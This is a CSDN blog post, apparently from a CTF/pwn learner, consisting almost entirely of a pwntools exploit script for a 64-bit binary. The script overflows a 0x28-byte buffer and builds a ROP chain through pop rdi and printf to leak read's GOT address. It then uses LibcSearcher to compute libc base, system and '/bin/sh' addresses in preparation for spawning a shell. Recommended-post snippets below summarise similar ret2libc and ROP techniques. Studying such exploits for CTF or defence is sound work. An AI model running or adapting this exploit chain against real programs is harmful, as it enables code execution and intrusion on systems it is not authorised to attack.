64位 rop泄露read地址

最新推荐文章于 2024-08-04 20:58:21 发布
最新推荐文章于 2024-08-04 20:58:21 发布
阅读量80 收藏
点赞数 1
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50852871/article/details/140159609
版权 

padding = 0x28

pop_rdi = 0x0000000000400733
ret = 0x00000000004004d1

read_got = elf.got['read']
printf_sym = elf.sym['printf']
main = elf.sym['main']



rl('name?')
payload = b'a' * padding + p64(ret) + p64(pop_rdi) + p64(read_got) + p64(printf_sym) + p64(ret) + p64(main)
sl(payload)

read_addr = l64()
lg('read_addr', read_addr)


libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')

lg('libc_base',libc_base)
lg('system',system)
lg('binsh',binsh)
Abiu~
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
64位ROP(level5)
weixin_44642009的博客
04-06 1449
64位ROP 开始接触的ROP都是针对于32位,和64位的比起来,主要是编址以及函数传参的方式不一样,32位的传参是直接将其压入栈中,我们便可以通过覆盖返回地址的方法,对函数的跳转进行控制而达到我们的目的,而64位的传参首先是使用六个寄存器,其次更多的参数压入栈中,其参数存放寄存器的顺序依次是rdirdirdi,rsirsirsi,rdxrdxrdx,rcxrcxrcx,r8dr8dr8d,r9d...
64位ROP——通用gadget
qq_44759495的博客
04-09 2851
原理与目的 程序在编译的时候会加入一些通用函数来进行初始化操作,所以可以针对初始化函数来提取一些通用的gadget,通过泄露某个在libc中的内容在内存中的实际地址,通过计算偏移量来得到system和bin/sh的地址,然后利用返回指令ret连接代码,最终getshell。 实验步骤 chechsec命令检查是否有canary保护 图中显示并没有,如果有的话,就先进行泄露。 IDA反汇编 int...
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 656
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
深入探究64位rop链构造,wp中常见的万能gadgets详解| 攻防世界pwn进阶区welpwn
Kni9hT's Blog
03-20 1691
文章目录前言思路分析0x00.检查保护机制0x01.找到溢出点0x02.跳过echo在buf上构造rop0x03.选择合适的gadgets0x04.万能的通用gadgets利用过程使用DynELF使用LibcSearcher 前言 这一题做的时间跨度比较长了,断断续续做了一天多,然后尝试了两种方式,一种是DynELF泄露system地址,还有一种是利用python的LibcSearcher模块得到...
64位程序rop链构造|攻防世界pwn进阶区 pwn-100
Kni9hT's Blog
03-16 4022
文章目录前言利用思路0x01.ida调试发现sub_40063D函数可以溢出0x02.cyclic计算溢出需要填充72字节0x03.checksec看一下保护0x04.利用思路:0x05.可以用vmmap查找binary文件地址0x06.用 `ROPgadget --binary pwn100 --only "pop|ret" | grep rdi`命令寻找ROP0x07.32位程序和64位程序...
pwn篇:32位及64位无PIE保护ROP方法
weixin_44644249的博客
02-03 1291
32位和64位ROP方法 先记录一下,暂时还没有学会绕过PIE 源码 #include<stdio.h> #include<unistd.h> void vuln_func() { char buf[128]; read(STDIN_FILENO,buf,256);//溢出点 } int main(int argc,char* argv[]) { vuln_func(); write(STDOUT_FILENO,"Hello world\n",13); } 32位 编译
一个关于rop泄露libc的问题
m0_64195960的博客
07-08 140
题干是这样的,题目就在buuctf上就是利用read函数栈溢出,rop泄露libc,需要注意以下64位传参就可以了但是我有一个疑问就是,为什么红色箭头这里的recv必须要加,如果这里加的话,下一行的p.recv(6)不久没有东西接受了吗?有没有好心的师傅指导一下,谢谢!这是加了p.recv()这是没加......
rop [二] 无libc泄露rop注意
令则
03-10 501
rop_unlibc 文章目录rop_unlibcDynelf使用方法:writeputsgets==!!谨慎另述--注意点leak后用start_addrread后尽量去system三参数gadget的call [r12+rbx*8]应该用got表 当无libc文件时rop的思路, 这是对于上一篇rop简单总结的一个补充, 关于一个rop无libc文件,和一些其他的小细节上面的总结, Dyn...
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
arm64_rop_exploit arm64 rop小工具二进制文件,用于将arm64反向外壳程序代码映射到内存中并执行代码这仅适用于目标arm64设备。 用于将rop小工具映射到内存中并从libc库执行shell代码的源代码。 在运行Ubuntu 18.04....
ROP : Read origin protocol:ROP 是一种计算协议,用于发现所有读取的来源-开源
07-23
ROP 是一种计算协议,旨在发现所有读数的来源,这些读数源自复杂的 RNA 分子、重组抗体和微生物群落。 ROP 占 poly(A) 和核糖耗竭协议所有读数的 98.8%,而传统的基于参考的协议为 83.8%。 ROP 分析重复、circRNA、...
rop轻松谈.pdf
10-21
ROP技術是基於Buffer Overflow的攻擊技術,通過覆蓋函數返回地址,控制程式的執行流程。ROP技術的主要思想是,通過在Buffer中注入惡意代碼,覆蓋函數返回地址,控制程式的執行流程,實現攻擊的目的。 Buffer ...
ROP之ret2alsolve(32位)详解
06-18
ROP之ret2alsolve(32位)详解
rop开放平台
04-12
ROP(Return-Oriented Programming,返回导向编程)是一种高级的代码注入技术,广泛应用于软件安全领域,特别是针对那些启用了地址空间布局随机化(ASLR)但仍存在缓冲区溢出漏洞的程序。ROP允许攻击者在没有直接...
Linux 下 Anaconda/Miniconda 环境安装教程
蜡笔小新星的博客
08-04 648
通过以上步骤,你应该能够详尽地完成 Anaconda 或 Miniconda 的安装,创建和管理环境。
Linux|最佳命令行下载加速器
冷冻工厂
08-04 318
它兼容多种网络协议,包括但不限于 DICT、FILE、FTP、FTPS、GOPHER、HTTP、HTTPS、IMAP、IMAPS、LDAP、LDAPS、POP3、POP3S、RTMP、RTSP、SCP、SFTP、SMB、SMBS、SMTP、SMTPS、TELNET 和 TFTP,根据其官方文档所述。wget 提供了丰富的选项,包括进行需要认证的下载、设置递归下载的深度限制、支持 URL 的正则表达式匹配、允许排除特定内容、从文件中读取 URL 等。可以想象,有了这样的支持,curl 的应用场景非常广泛。
Linux初学基本命令
yuan20010401的博客
07-25 1310
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux 6: 正则表达式 - 2024-08-Week1
最新发布
weixin_48029567的博客
08-04 145
正则表达式:Regular expression是处理字符串的方法,常常用来某些特定的字符串。
【Kubernetes】Deployment 的状态
书山有路,学海无涯。记录成长,追逐梦想
08-04 544
通过使用 Deployment 控制器,开发人员可以部署 Pod、设置 Pod 的副本、实现 Pod 的升级与回滚。在 YAML 文件中描述清楚了 Deployment 控制器的目标是什么,Deployment 控制器会自动完成对 Pod 和 ReplicaSet 的管理。Kubernetes 可以直接运行一个新的 Deployment 控制器,也可以用一个新的 Deployment 控制器替换旧的 Deployment 控制器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值